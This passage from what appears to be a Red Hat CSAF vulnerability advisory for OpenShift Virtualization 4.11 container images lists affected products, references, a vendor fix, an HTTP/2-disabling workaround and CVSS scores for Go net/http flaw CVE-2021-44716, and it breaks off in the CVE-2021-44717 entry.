"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-44716", }, { category: "external", summary: "RHBZ#2030801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030801", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-44716", url: "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", url: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, ], release_date: "2021-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, { category: "workaround", details: "This flaw can be mitigated by disabling HTTP/2. Setting the GODEBUG=http2server=0 environment variable before calling Serve will disable HTTP/2 unless it was manually configured through the golang.org/x/net/http2 package.", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/http: limit growth of header canonicalization cache", }, { cve: "CVE-2021-44717", cwe: { id: "CWE-200", name: "Exposure of Sensitive Information to an Unauthorized Actor", }, discovery_date: "2021-12-09T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", 